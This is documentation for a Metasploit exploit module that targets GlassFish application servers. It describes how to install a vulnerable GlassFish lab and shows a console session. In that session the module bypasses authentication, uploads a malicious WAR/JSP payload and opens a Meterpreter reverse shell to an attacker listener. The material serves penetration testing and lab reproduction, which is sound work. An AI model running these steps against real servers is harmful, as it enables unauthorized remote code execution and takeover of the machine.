documentation/modules/exploit/multi/http/glassfish_deployer.md
## Vulnerable Application
### Description
This module logs in to a GlassFish Server (Open Source or Commercial) using various methods (such as authentication bypass, default credentials, or user-supplied login), and deploys a malicious war file in order to get remote code execution. It has been tested on Glassfish 2.x, 3.0, 4.0 and Sun Java System Application Server 9.x. Newer GlassFish versions do not allow remote access (Secure Admin) by default, but is required for exploitation.
### GlassFish
GlassFish is a open-source application server project started by Sun Microsystems for the Java EE platform and now sponsored by Oracle Corporation. The supported version is called Oracle GlassFish Server. GlassFish is free software, dual-licensed under two free software licences: the Common Development and Distribution License (CDDL) and the GNU General Public License (GPL) with the classpath exception.
### Installation
For testing purposes, the following explains how you can install a vulnerable version of GlassFish on Ubuntu Linux:
1. Make sure you have a clean Ubuntu box
2. Open a terminal on the Ubuntu box, and do: ```sudo apt-get install default-jdk```. We assume this gives you JDK 8.
3. Download [GlassFish 4.0](http://download.java.net/glassfish/4.0/release/glassfish-4.0.zip)
4. Unzip GlassFish-4.0, navigate to the bin directory, and then start ```asadmin```
5. In the asadmin console, do ```start-domain domain1```. This will start GlassFish.
6. On the Ubuntu box, go to http://localhost:4848 with a browser
7. On the left menu, click on ```Domain```
8. On the right, click on ```Administrator Password```
9. Set a new password for admin
10. On the left menu, click on ```server (Admin server)```
11. On the right, click on ```Secure Administrator```
12. Click on ```Enable Secure Admin```
13. You will need to wait for up to a minute to make sure GlassFish is up and running again on port 4848.
If you are on a different platform (such as Windows), the installation should be quite similar.
## Verification Steps
1. Do: ```use exploit/multi/http/glassfish_deployer```
2. Do: ```set RHOST [IP]```
3. Do: ```set USERNAME [Username]```
4. Do: ```set PASSWORD [Password]```
5. Do: ```run```
## Scenarios
### GlassFish 3.0.1 on Windows 2003
```
msf > use exploit/multi/http/glassfish_deployer
msf exploit(glassfish_deployer) > set RHOST 172.16.182.237
RHOST => 172.16.182.237
msf exploit(glassfish_deployer) > set USERNAME admin
USERNAME => admin
msf exploit(glassfish_deployer) > set PASSWORD admin123
PASSWORD => admin123
msf exploit(glassfish_deployer) > exploit
[*] Started reverse TCP handler on 172.16.182.112:4444
[*] Glassfish edition: GlassFish Server Open Source Edition 3.0.1
[*] Trying GlassFish authentication bypass..
[+] http://172.16.182.237:4848// - GlassFish - SUCCESSFUL authentication bypass
[*] Uploading payload...
[*] Successfully uploaded
[*] Executing /icDfejbl6Vc9ZobfgVv9LIBES/SV7fVtWuTQFZqtzMPiJ.jsp...
[*] Sending stage (30355 bytes) to 172.16.182.237
[*] Meterpreter session 1 opened (172.16.182.112:4444 -> 172.16.182.237:1472) at 2017-03-27 19:07:58 -0500
[*] Getting information to undeploy...
[*] Undeploying icDfejbl6Vc9ZobfgVv9LIBES...
[*] Undeployment complete.
meterpreter > getuid
Server username: Administrator
meterpreter > sysinfo
Computer : juan-6ed9db6ca8
OS : Windows 2003 5.2 (x86)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...
```